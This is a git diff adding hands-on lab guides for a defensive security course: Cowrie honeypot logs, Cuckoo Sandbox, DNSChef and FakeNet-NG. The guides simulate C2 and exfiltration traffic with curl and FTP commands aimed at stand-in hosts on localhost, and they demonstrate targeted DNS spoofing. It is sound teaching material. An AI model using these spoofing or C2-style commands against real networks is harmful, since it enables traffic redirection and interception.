+Change into the Cowrie log Directory:
+
+`~$` **`cd /opt/cowrie/var/log/cowrie`**
+
+Now tail the contents of cowrie.log:
+
+`/opt/cowrie/var/log/cowrie$` **`tail cowrie.log`**
+
+        2016-02-17 21:52:12-0700 [-] unauthorized login:
+        2016-02-17 21:54:51-0700 [SSHService ssh-userauth on HoneyPotTransport,0,127.0.0.1] adhd trying auth password
+        2016-02-17 21:54:51-0700 [SSHService ssh-userauth on HoneyPotTransport,0,127.0.0.1] login attempt [adhd/asdf] failed
+        2016-02-17 21:54:52-0700 [-] adhd failed auth password
+        2016-02-17 21:54:52-0700 [-] unauthorized login:
+        2016-02-17 21:54:53-0700 [SSHService ssh-userauth on HoneyPotTransport,0,127.0.0.1] adhd trying auth password
+        2016-02-17 21:54:53-0700 [SSHService ssh-userauth on HoneyPotTransport,0,127.0.0.1] login attempt [adhd/adhd] failed
+        2016-02-17 21:54:54-0700 [-] adhd failed auth password
+        2016-02-17 21:54:54-0700 [-] unauthorized login:
+        2016-02-17 21:54:54-0700 [HoneyPotTransport,0,127.0.0.1] connection lost
+
+Here we can clearly see my login attempts and the username/password combos I employed as I tried
+to gain access in [Example 2: Cowrie In Action].  This could be very useful!
+
+Also, when you get a chance, take a look at the command configuration files in the `/opt/cowrie/honeyfs` directory.
+
+Finally, user accounts for logging into the fake ssh server can be placed in a `/opt/cowrie/etc/userdb.txt` file. This file no longer exists by default, so Cowrie uses credentials specified near the top of `/opt/cowrie/src/cowrie/core/auth.py` by default
+
+An example userdb file can be found in `/opt/cowrie/etc/userdb.example`. Cowrie
+credentials can be specified using patterns. These patterns are explained in the
+example file.
+
+What happens when you log in with one of the valid userID and password combos?
+
+What happens when you exit the session?
+
+What are some solid IOCs that this is a honeypot?
+--!>
+ 
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/OpeningKaliInstance.png b/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/OpeningKaliInstance.png
new file mode 100644
index 00000000..128fe9d7
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/OpeningKaliInstance.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/TaskbarKaliIcon.png b/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/TaskbarKaliIcon.png
new file mode 100644
index 00000000..c8d6bd97
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/TaskbarKaliIcon.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/dockercowriecommand.png b/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/dockercowriecommand.png
new file mode 100644
index 00000000..b1cff625
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/dockercowriecommand.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/enterpassword.png b/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/enterpassword.png
new file mode 100644
index 00000000..f95ad8fe
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/enterpassword.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/gettingroot.png b/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/gettingroot.png
new file mode 100644
index 00000000..0913d1f2
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/gettingroot.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/reflection.png b/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/reflection.png
new file mode 100644
index 00000000..527a9318
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/reflection.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/rmsshhosts.png b/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/rmsshhosts.png
new file mode 100644
index 00000000..918907da
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/rmsshhosts.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/rootlocalhost.png b/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/rootlocalhost.png
new file mode 100644
index 00000000..3fb64eba
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/rootlocalhost.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/runningprocessdocker.png b/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/runningprocessdocker.png
new file mode 100644
index 00000000..4e569be7
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/runningprocessdocker.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/servershutdown.png b/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/servershutdown.png
new file mode 100644
index 00000000..20aaa16a
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/servershutdown.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/systemname.png b/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/systemname.png
new file mode 100644
index 00000000..9494cc79
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/systemname.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/terminalcommands.png b/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/terminalcommands.png
new file mode 100644
index 00000000..cf0a76f2
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/terminalcommands.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/vimfileedit.png b/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/vimfileedit.png
new file mode 100644
index 00000000..6c0b8179
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/Cowrie/attachments/vimfileedit.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/CuckooSandbox.md b/IntroClassFiles/Tools/IntroClass/ADHD/CuckooSandbox.md
new file mode 100644
index 00000000..754a464f
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/ADHD/CuckooSandbox.md
@@ -0,0 +1,374 @@
+![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
+
+
+
+
+
+
+# Cuckoo Sandbox
+
+> **Goal:** See how Cuckoo Sandbox automatically analyzes suspicious files in an isolated Windows VM, and how an analyst can read the results.
+
+---
+
+### In this lab we will
+
+- Install and initialize Cuckoo Sandbox
+- Start the Cuckoo daemon and web interface
+- Submit a suspicious file for analysis
+- Explore the generated report (process tree, files, registry, network, signatures)
+- Watch the live Cuckoo logs while an analysis runs
+
+---
+
+## 1. Create a dedicated `cuckoo` user (host hygiene)
+
+We don’t want to run malware analysis as root or as your daily user.
+
+Open a terminal and run:
+
+```bash
+sudo adduser cuckoo
+```
+
+- Follow the prompts (you can press **Enter** through most fields)
+- Add the new user to the `vboxusers` group so it can control VirtualBox:
+
+```bash
+sudo usermod -aG vboxusers cuckoo
+```
+
+Now switch to that user for the rest of the lab:
+
+```bash
+su - cuckoo
+```
+
+You should now see a prompt like:
+
+```bash
+cuckoo@kali:~$
+```
+
+---
+
+## 2. Install Cuckoo Sandbox and basic tools
+
+Still as user `cuckoo` (but using `sudo` when needed), install Cuckoo from the distro repository:
+
+```bash
+sudo apt update
+sudo apt install -y cuckoo
+```
+
+Install a few useful extras (optional but nice to have):
+
+```bash
+sudo apt install -y volatility yara ssdeep mongodb
+```
+
+Quick check that Cuckoo is available:
+
+```bash
+cuckoo --version
+```
+
+You should see a version string, not a “command not found” error.
+
+---
+
+## 3. Initialize Cuckoo’s working directory
+
+On first run, Cuckoo will create its **Cuckoo Working Directory (CWD)** under `~/.cuckoo` with config files, logs, and results.
+
+Run:
+
+```bash
+cuckoo
+```
+
+You should see output saying it’s your first run and that it created configuration under `~/.cuckoo`.  
+Press **Ctrl + C** once it finishes initializing (if it doesn’t exit automatically).
+
+Let’s also pull in community signatures (for more interesting reports):
+
+```bash
+cuckoo community
+```
+
+This may take a bit while it downloads rules/signatures.
+
+---
+
+## 4. Start Cuckoo daemon and web interface
+
+We want two terminals:
+
+### 4.1. Terminal 1 – Cuckoo daemon (backend)
+
+Make sure you are `cuckoo` user in your home directory, then run:
+
+```bash
+cuckoo -d
+```
+
+- `-d` = debug mode (more verbose logs)
+- Leave this terminal **running**. Cuckoo will start workers and wait for submissions.
+
+### 4.2. Terminal 2 – Cuckoo web interface
+
+Open a **second terminal** (also as user `cuckoo`) and run:
+
+```bash
+cuckoo web runserver 127.0.0.1:8000
+```
+
+Again, leave this running. This is the web UI.
+
+### 4.3. Verify access in the browser
+
+Inside your Linux VM, open a browser (e.g. Firefox) and go to:
+
+```text
+http://127.0.0.1:8000
+```
+
+You should see the **Cuckoo web dashboard**.
+
+If it loads, your analysis environment is up.
+
+---
+
+## 5. Prepare a test “malicious” file
+
+For a safe demo we’ll use the **EICAR test file**, which is harmless but recognized by many tools as a test virus.
+
+In a third terminal (still as `cuckoo`), create a directory for samples:
+
+```bash
+mkdir -p ~/samples
+cd ~/samples
+```
+
+Download the EICAR test file:
+
+```bash
+curl -o eicar.com.txt https://secure.eicar.org/eicar.com.txt
+```
+
+List the file to be sure it’s there:
+
+```bash
+ls -l
+```
+
+You should see `eicar.com.txt`.
+
+> **Note:** Some AV inside the Windows VM may try to delete this file. That’s fine; it’s part of the fun.
+
+---
+
+## 6. Submit a sample from the Cuckoo web UI
+
+Go back to your browser on `http://127.0.0.1:8000`.
+
+1. Click **Submit** (or **Analyze** depending on your version).
+2. In **File** upload, choose:
+   - `eicar.com.txt` from `/home/cuckoo/samples/`
+3. Make sure:
+   - Machine: the default Windows VM (your instructor will tell you which name to use if there are several)
+   - Analysis options: leave defaults (timeout ~120s is fine)
+4. Click **Submit** / **Analyze**.
+
+You should see a message that a task was created (for example, **Task #1**).
+
+### 6.1. Watch the queue
+
+Click on **Tasks** / **Recent** in the web UI. You should see your task moving through states:
+
+- `pending` → `running` → `reported`
+
+This may take a couple of minutes depending on your VM.
+
+Meanwhile, in **Terminal 1** (where `cuckoo -d` is running), you’ll see live logs: starting VM, sending sample, collecting results, etc.
+
+---
+
+## 7. (Optional) Submit via CLI
+
+You can also submit samples from the command line.
+
+In a separate terminal as `cuckoo`:
+
+```bash
+cuckoo submit ~/samples/eicar.com.txt
+```
+
+It will print the created task ID (e.g., `Task #2`).  
+You’ll see it appear in the web UI as well.
+
+---
+
+## 8. Tail Cuckoo logs like an analyst
+
+To get the “blue team” view, we’ll watch the main log file.
+
+Open **another terminal** as `cuckoo` and run:
+
+```bash
+tail -f ~/.cuckoo/log/cuckoo.log
+```
+
+Now, when you submit a new sample (web or CLI), you can see:
+
+- When Cuckoo queues the task
+- When it powers on the analysis VM
+- When it starts/stops the agent
+- When it processes and stores the report
+
+Leave this running while you trigger analyses.
+
+---
+
+## 9. Explore the analysis report
+
+Once your EICAR task shows as **reported** in the web UI, click its **Task ID** to open the report.
+
+Spend a few minutes browsing each tab. For each, think:
+
+- *What is this showing?*
+- *How would this help an analyst or defender?*
+
+### 9.1. Summary
+
+Look at:
+
+- Basic info: sample name, MD5/SHA1/SHA256
+- Score (how suspicious it is)
+- Quick summary of signatures fired, network activity, dropped files
+
+### 9.2. Behavior / Process Tree
+
+Look at:
+
+- **Process tree** (what process executed the file, what children it spawned)
+- **API calls** per process (file/registry/network operations)
+- Time line of actions
+
+Ask yourself:
+
+- Which process actually executed the sample?
+- Did it spawn any interesting child processes (e.g., `cmd.exe`, `powershell.exe`)?
+
+### 9.3. Files & Registry
+
+Check:
+
+- **Dropped files**: Did the sample write new files to disk?
+- **Modified registry keys**: Persistence tricks often live here.
+
+### 9.4. Network
+
+Check:
+
+- DNS requests
+- HTTP/HTTPS connections
+- IPs and ports contacted
+
+Ask:
+
+- Which domains/IPs were contacted?
+- Would you block these in a real network?
+
+### 9.5. Signatures
+
+Cuckoo has built‑in and community **signatures** that look for known behaviors.
+
+- Find which signatures fired (e.g., “EICAR test file detected”, “Suspicious network activity”, etc.)
+- Click each one and read its description
+
+This is where defenders get a **high-level interpretation** of the raw behavior.
+
+---
+
+## 10. Mini “attack vs defense” exercise
+
+Let’s play both sides.
+
+### 10.1. Attacker perspective
+
+From the attacker’s point of view, they just:
+
+- Drop or email a suspicious executable
+- Get someone to run it on a Windows machine
+
+In our lab, you “play” the attacker by **submitting the sample** into Cuckoo.
+
+### 10.2. Defender / analyst perspective
+
+From the defender’s point of view, they:
+
+- Receive the suspicious file (from email gateway, SOC ticket, etc.)
+- Drop it into Cuckoo for **dynamic analysis**
+- Read the generated report to decide:
+  - Is this malicious?
+  - What does it do (IOCs, persistence, callbacks)?
+  - What should we block or hunt for?
+
+In this lab, you are the analyst when you:
+
+- Watch `~/.cuckoo/log/cuckoo.log` while the sample runs
+- Explore the report tabs and extract:
+  - Domains/IPs
+  - Filenames/paths
+  - Registry keys
+  - Suspicious processes / commands
+
+> **Task for students:** Write down at least **3 IOCs** (e.g., domain, file path, hash) from the report that you would feed into SIEM / EDR for hunting.
+
+---
+
+## 11. Bonus: Run a benign file and compare
+
+To see the difference between benign and malicious behavior:
+
+1. Copy a random, benign Windows EXE (e.g., a small tool or viewer) into `~/samples/benign.exe`.
+2. Submit it the same way (web or CLI).
+3. Compare its report to the EICAR report:
+   - Fewer or no signatures firing
+   - Simpler process tree
+   - Less/no network activity
+
+This contrast helps students understand what **“normal”** vs **“suspicious”** looks like.
+
+---
+
+## 12. Clean up
+
+When you’re done:
+
+1. Stop the web server terminal (**Ctrl + C**).
+2. Stop the Cuckoo daemon terminal (**Ctrl + C**).
+3. Optionally delete the sample files:
+
+```bash
+rm -rf ~/samples
+```
+
+
+
+
+***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/RITA.md)</i></b>
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/ADHD/dionaea.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
+
+Please be sure to destroy the lab environment!
+
+[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
+
+---
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/DNSChef.md b/IntroClassFiles/Tools/IntroClass/ADHD/DNSChef.md
new file mode 100644
index 00000000..4f2134d2
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/ADHD/DNSChef.md
@@ -0,0 +1,228 @@
+![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
+
+
+# DNSChef
+
+
+# For the Ubuntu VM
+
+
+### In this lab we will
+
+- Install and run **DNSChef** (a DNS proxy / spoofing tool)
+- Observe how it **logs DNS queries**
+- See how it can **spoof DNS answers** for specific domains
+- Use it as a **deception tool** by pointing a domain to a fake service
+
+
+---
+
+## Understand your normal DNS resolution
+
+- Before using **DNSChef**, see what your **DNS** looks like normally.
+
+### Check where DNS queries go by default
+
+```bash
+cat /etc/resolv.conf
+```
+
+<img width="225" height="72" alt="2026-03-17_11-27" src="https://github.com/user-attachments/assets/9e2eefc7-8435-4d26-aaee-6791ace9da4c" />
+
+
+- That’s your current **DNS resolver**
+
+### Resolve a domain normally
+
+```bash
+dig example.com +short
+```
+
+<img width="470" height="68" alt="2026-03-17_11-28" src="https://github.com/user-attachments/assets/60e8a224-eef2-43eb-afd1-bde3855e43ef" />
+
+
+- Note the IP address you get
+- This is the **legitimate** DNS answer from your normal resolver
+
+- We’ll **compare** this later with the **spoofed** result
+
+---
+
+## Run DNSChef as a logging DNS proxy
+
+- First, we’ll use DNSChef to **observe** DNS traffic, without spoofing anything.
+
+### Start DNSChef (logging only)
+
+- Open **Terminal 1** and run:
+
+```bash
+cd ~/ADCD/dnschef/
+```
+
+```bash
+sudo python3 dnschef.py --interface 0.0.0.0 --port 53530 --nameserver 8.8.8.8
+```
+
+Explanation:
+
+- `--interface 0.0.0.0` – listen on all interfaces
+- `--nameserver 8.8.8.8` – forward all queries to Google DNS, without changes
+
+You should see DNSChef starting and waiting for queries. Keep this terminal open
+
+<img width="730" height="280" alt="2026-03-17_11-29" src="https://github.com/user-attachments/assets/9ee71875-4703-4326-8796-74f7d5ea7f9c" />
+
+
+### Send queries to DNSChef
+
+Open **Terminal 2** and run:
+
+```bash
+dig @127.0.0.1 -p 53530 www.google.com
+dig @127.0.0.1 -p 53530 example.com
+dig @127.0.0.1 -p 53530 www.wikipedia.org
+```
+
+- `@127.0.0.1` tells `dig` to use DNSChef (listening on localhost) as the DNS server
+
+Watch **Terminal 1** (DNSChef):
+
+- You should see **logs** of each **query** being made and the response from **upstream**
+- This is what a defender/analyst would see when monitoring DNS traffic
+
+<img width="820" height="88" alt="2026-03-17_11-31" src="https://github.com/user-attachments/assets/a8bc528d-ef65-49bf-9bd9-5b2b960aceb6" />
+
+
+
+- You can stop **DNSChef** with `Ctrl + C` in **Terminal 1**
+
+- We’ll restart it in the next steps with **spoofing enabled**
+
+---
+
+## Simple DNS spoofing (fake IP for all domains)
+
+- Now let’s use **DNSChef** to **lie** about where domains point to
+
+- We’ll make **every** DNS query resolve to the same IP
+
+- For demonstration, we’ll use `127.0.0.1` (your own machine)
+
+### Start DNSChef with global IP spoofing
+
+In **Terminal 1**:
+
+```bash
+sudo python3 dnschef.py --interface 0.0.0.0 --port 53530 --fakeip 127.0.0.1
+```
+
+- `--fakeip 127.0.0.1` – return `127.0.0.1` for **all A-record (IPv4)** DNS queries
+- No upstream **DNS server** is specified now – **DNSChef** always responds with the fake IP
+
+### Test spoofing with dig
+
+In **Terminal 2**:
+
+```bash
+dig @127.0.0.1 -p 53530 example.com +short
+dig @127.0.0.1 -p 53530 www.google.com +short
+dig @127.0.0.1 -p 53530 anyrandomdomainthatdoesnotexist123.com +short
+```
+
+<img width="1156" height="172" alt="2026-03-17_11-33" src="https://github.com/user-attachments/assets/0eee9628-45bb-4c55-bbf1-2d353a513a6c" />
+
+
+
+You should see that all of them return:
+
+```text
+127.0.0.1
+```
+
+From the **attacker** perspective:
+
+- Any client using this DNS server will be redirected to **your** IP
+
+From the **defender/deception** perspective:
+
+- You can point **malware** or suspicious hosts to a **sinkhole** IP where you log or analyze them
+
+Stop DNSChef with `Ctrl + C` in **Terminal 1** when you’re done
+
+---
+
+## Targeted spoofing of a single domain (with upstream passthrough)
+
+- Global spoofing is noisy and easy to detect
+
+- A more realistic use case is to **spoof only one domain** and let others resolve normally.
+
+### Scenario
+
+- Only `login.badbank.test` should be spoofed to a fake IP (our machine).
+- All other domains should resolve via a real DNS server (e.g. `8.8.8.8`).
+
+### Start DNSChef with selective spoofing
+
+In **Terminal 1**:
+
+```bash
+sudo python3 dnschef.py \
+  --interface 0.0.0.0 \
+  --port 53530 \
+  --nameserver 8.8.8.8 \
+  --fakeip 127.0.0.1 \
+  --fakedomains login.badbank.test
+```
+
+<img width="876" height="282" alt="2026-03-17_11-34" src="https://github.com/user-attachments/assets/4c845001-ca6f-4e03-b1b8-07172b78cdf6" />
+
+
+Explanation:
+
+- `--fakeip 127.0.0.1` – fake IP to return
+- `--fakedomains login.badbank.test` – spoof **only** this domain
+- `--nameserver 8.8.8.8` – use Google DNS for all other domains (pass-through)
+
+### Test the spoofed domain vs normal domains
+
+In **Terminal 2**:
+
+```bash
+# Spoofed domain
+dig @127.0.0.1 -p 53530 login.badbank.test +short
+```
+
+```bash
+# Normal domains (pass-through to real DNS)
+dig @127.0.0.1 -p 53530 example.com +short
+```
+
+```bash
+dig @127.0.0.1 -p 53530 www.google.com +short
+```
+
+- `login.badbank.test` should resolve to `127.0.0.1`.
+- Other domains should resolve to their **real IP addresses** (similar to your earlier tests).
+
+
+<img width="955" height="84" alt="2026-03-17_11-36" src="https://github.com/user-attachments/assets/7ad81fbc-2522-4019-bb09-13e056408013" />
+
+
+
+
+***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/ADHD/FakeNet-NG.md)</i></b>
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/ADHD/RITA_ADHD/RITA.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
+
+Please be sure to destroy the lab environment!
+
+[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
+
+---
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/FakeNet-NG.md b/IntroClassFiles/Tools/IntroClass/ADHD/FakeNet-NG.md
new file mode 100644
index 00000000..c404ad8b
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/ADHD/FakeNet-NG.md
@@ -0,0 +1,222 @@
+![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
+
+# FakeNet-NG
+
+# For the Ubuntu VM
+
+
+### In this lab we will
+- Run **FakeNet-NG** on Linux
+- See how it intercepts and emulates network services
+- Simulate “malware-like” traffic from the same host
+- Inspect logs / captures to understand what happened
+
+---
+
+## Start FakeNet-NG (the fake Internet)
+
+- Open up a **terminal** and run
+
+```bash
+cd ~/ADCD/fakenet-ng
+```
+
+```bash
+sudo fakenet -c lab.ini
+```
+
+You should see something like:
+
+<img width="948" height="512" alt="2026-03-17_11-39" src="https://github.com/user-attachments/assets/fbae2273-cdd7-4a7e-9fc3-28640bdd2faf" />
+
+
+**FakeNet-NG** will **keep running in the foreground**
+
+Leave this terminal window open. This is your **“Deception / Analyst” view**
+
+---
+
+## See what FakeNet-NG is listening on
+
+Open a **second terminal**.
+
+### List listening ports
+
+```bash
+sudo ss -tulnp | grep -i fakenet
+```
+
+<img width="1022" height="247" alt="2026-03-17_11-48" src="https://github.com/user-attachments/assets/a29d299f-daa5-4cf3-81bb-e18d07e5d1fa" />
+
+
+
+You should see FakeNet-NG listening on multiple ports, for example:
+
+- 80 (**HTTP**)
+- 443 (**HTTPS/SSL**)
+- 21 (**FTP**)
+- 25 (**SMTP**)
+- Others depending on your version/config
+
+> FakeNet-NG pretends to be many services at once,
+> so “**malware**” thinks it is talking to the real **Internet**
+
+---
+
+## Simulate simple web "malware" traffic
+
+- FakeNet-NG is still running in **terminal 1**.  
+- In **terminal 2**, we'll play the role of the "malware" sending traffic.
+
+> [!NOTE]
+> Since the DNS listener is disabled in `lab.ini`, we use `--resolve` to bypass DNS lookup and connect directly to FakeNet-NG on `127.0.0.1`.
+
+### HTTP request to a domain
+
+```bash
+curl http://totally-not-evil-c2.com/ --resolve totally-not-evil-c2.com:80:127.0.0.1
+```
+
+Watch **terminal 1** (FakeNet-NG window):
+
+- You should see an HTTP request logged by FakeNet-NG
+- FakeNet-NG will return some default HTML content in terminal 2:
+
+<img width="1422" height="727" alt="2026-03-17_22-13" src="https://github.com/user-attachments/assets/d693ec6f-6486-4319-9246-05a6a796d22f" />
+
+
+### HTTPS request (FakeNet as fake TLS server)
+
+```bash
+curl https://really-bad-c2.example/ -k --resolve really-bad-c2.example:443:127.0.0.1
+```
+
+---
+
+## Simulate FTP "malware" traffic
+
+Some malware uses **FTP** to exfiltrate data or download additional payloads.
+FakeNet-NG has a fully emulated FTP server listening on port **21**.
+
+### Connect to the fake FTP server
+
+```bash
+ftp 127.0.0.1
+```
+
+When prompted, enter any username and password - FakeNet-NG will accept them:
+
+```
+Name: malware
+Password: infected
+```
+
+<img width="477" height="227" alt="2026-03-17_22-28" src="https://github.com/user-attachments/assets/7ac5ae8d-02a7-4eee-9eca-a8840e3cc6ae" />
+
+Watch **terminal 1** (FakeNet-NG window):
+
+- You should see the FTP connection logged with the banner FakeNet-NG presents
+- The fake credentials you entered will be captured in the logs
+
+<img width="1202" height="180" alt="2026-03-17_22-27" src="https://github.com/user-attachments/assets/ee19fad5-11d4-4414-9538-b23c9ebb8568" />
+
+
+### Try some FTP commands
+
+Once connected, try a few commands to generate more traffic:
+
+```ftp
+ls
+pwd
+get secret-data.txt
+quit
+```
+
+<img width="761" height="551" alt="2026-03-17_22-28" src="https://github.com/user-attachments/assets/b7e3dc00-79c5-4a76-a453-a5b4bf3d7435" />
+
+
+Watch **terminal 1**:
+
+- Each command will be logged by FakeNet-NG
+- FakeNet-NG will respond as if it were a real FTP server
+- File requests will be served from the `defaultFiles/` webroot defined in `lab.ini`
+
+> In a real investigation, captured FTP credentials and filenames are valuable **IOCs**
+> that reveal what data the malware was trying to steal or download.
+
+---
+
+## Simulate a port-scanning "malware"
+
+Now we'll pretend the malware is scanning common service ports.
+
+### Scan common ports on localhost
+
+```bash
+nmap -Pn -p 21,25,53,80,443,110,1337 127.0.0.1
+```
+
+- From **nmap's perspective** (attacker view), it will look like these ports are open
+  and responding on `127.0.0.1`.
+
+<img width="739" height="333" alt="2026-03-17_22-24" src="https://github.com/user-attachments/assets/0e535802-6d03-41e1-a64e-a63e67cc1093" />
+
+
+> [!NOTE]
+> When FakeNet is active on Linux, **SYN** scans often show ports as **filtered**.
+> This happens because **FakeNet** intercepts packets using **iptables**/**NFQUEUE**.
+
+- In **terminal 1** (FakeNet-NG), you'll see many connection attempts logged
+  against the emulated services.
+
+You can push it further with a more aggressive scan (optional, but noisy):
+
+```bash
+nmap -sS -p- 127.0.0.1
+```
+
+FakeNet-NG will try to keep up and emulate responses, again acting as a fake, but convincing, network.
+
+---
+
+## Look at captures / logs
+
+Stop FakeNet-NG by going to **terminal 1** and pressing:
+
+```text
+Ctrl + C
+```
+
+Depending on version/config, FakeNet-NG will:
+
+- Save a **PCAP** file with captured traffic
+
+In the directory where you started FakeNet-NG, run:
+
+```bash
+ls
+```
+
+Look for `*.pcap` files
+
+If you see a `.pcap` file, you can open it with Wireshark later for deeper analysis:
+
+```bash
+wireshark captured_traffic.pcap
+```
+
+
+***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/ADHD/canarytokens/Canarytokens.md)</i></b>
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/ADHD/DNSChef.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
+
+Please be sure to destroy the lab environment!
+
+[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
+
+---
diff --git a/IntroClassFiles/Tools/IntroClass/FileAudit/FileAudit.md b/IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/FileAudit.md
similarity index 84%
rename from IntroClassFiles/Tools/IntroClass/FileAudit/FileAudit.md
rename to IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/FileAudit.md
index c73475fa..c2bc872c 100644
--- a/IntroClassFiles/Tools/IntroClass/FileAudit/FileAudit.md
+++ b/IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/FileAudit.md
@@ -60,7 +60,7 @@ Next we will nee to click on Select a principal in the Auditing Entry for Secret
 
 ![](attachment/SelectPrincipal.png)
 
-In the Select USer or Group window please type "Everyone" then select OK.
+In the Select User or Group window please type "Everyone" then select OK.
 
 ![](attachment/SelectUserOrGroup.png)
 
@@ -86,4 +86,19 @@ Once it opens the security log scroll down for the File System logs, then select
 
 ![](attachment/SecretLog4656.png)
 
-[Return To Lab List](https://github.com/strandjs/IntroLabs/blob/master/IntroClassFiles/navigation.md)
+
+***                                                              
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/ADHD/Caldera.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
+
+Please be sure to destroy the lab environment!
+
+[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
+
+---
+
+
diff --git a/IntroClassFiles/Tools/IntroClass/FileAudit/attachement/AddPrincipal.png b/IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachement/AddPrincipal.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/FileAudit/attachement/AddPrincipal.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachement/AddPrincipal.png
diff --git a/IntroClassFiles/Tools/IntroClass/FileAudit/attachement/AllFullControl.png b/IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachement/AllFullControl.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/FileAudit/attachement/AllFullControl.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachement/AllFullControl.png
diff --git a/IntroClassFiles/Tools/IntroClass/FileAudit/attachement/LocalSecurityPolicyOpen.png b/IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachement/LocalSecurityPolicyOpen.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/FileAudit/attachement/LocalSecurityPolicyOpen.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachement/LocalSecurityPolicyOpen.png
diff --git a/IntroClassFiles/Tools/IntroClass/FileAudit/attachement/Local_Audit_Audit_Object.png b/IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachement/Local_Audit_Audit_Object.png
